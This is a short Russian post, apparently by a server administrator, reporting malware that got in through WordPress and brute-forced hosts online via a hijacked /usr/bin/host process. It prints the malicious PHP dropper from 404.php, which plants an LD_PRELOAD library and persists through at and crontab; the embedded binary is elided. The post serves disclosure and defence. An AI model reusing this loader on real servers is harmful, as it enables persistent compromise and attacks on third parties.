Поймал гадость которая через вордпресс пробралась на сервер и интегрировалась впроцесс /usr/bin/host – запустив его из под пользователя www-data брутфорсила по всему интернету.
Нашел я эту гадость в файле /сайт/wp-includes/images/wlw/404.php .sd0 index.html
@touch(«index.html»); header(«Content-type: text/plain»); print «2842123700\n»; if (! function_exists(‘file_put_contents’)) { function file_put_contents($filename, $data) { $f = @fopen($filename, ‘w’); if (! $f) return false; $bytes = fwrite($f, $data); fclose($f); return $bytes; } } @system(«killall -9 «.basename(«/usr/bin/host»)); $so32 = «\x7f\x45\x4c —— бинарник большой —- x00»; $so64 = «\x7f\x45\x4c —— бинарник большой —- \x00\x00\x00»; $arch = 64; if (intval(«9223372036854775807») == 2147483647) $arch = 32; $so = $arch == 32 ? $so32 : $so64; $f = fopen(«/usr/bin/host», «rb»); if ($f) { $n = unpack(«C*», fread($f, 8)); $so[7] = sprintf(«%c», $n[8]); fclose($f); } $n = file_put_contents(«./libworker.so», $so); $AU=@$_SERVER[«SERVER_NAME»].$_SERVER[«REQUEST_URI»]; $HBN=basename(«/usr/bin/host»); $SCP=getcwd(); @file_put_contents(«1.sh», «#!/bin/sh\ncd ‘».$SCP.»‘\nif [ -f ‘./libworker.so’ ];then killall -9 $HBN;export AU='».$AU.»‘\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v ‘1\.sh’|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n»); @chmod(«1.sh», 0777); @system(«at now -f 1.sh», $ret); if ($ret == 0) { for ($i = 0; $i < 5; $i++) { if (! @file_exists(«1.sh»)) { print «AT success\n»; exit(0); } sleep(1); } } @system(«(crontab -l|grep -v crontab;echo;echo ‘* * * * * «.$SCP.»/1.sh’)|crontab», $ret); if ($ret == 0) { for ($i = 0; $i < 62; $i++) { if (! @file_exists(«1.sh»)) { print «CRONTAB success\n»; exit(0); } sleep(1); } } @system(«./1.sh»); @unlink(«1.sh»);
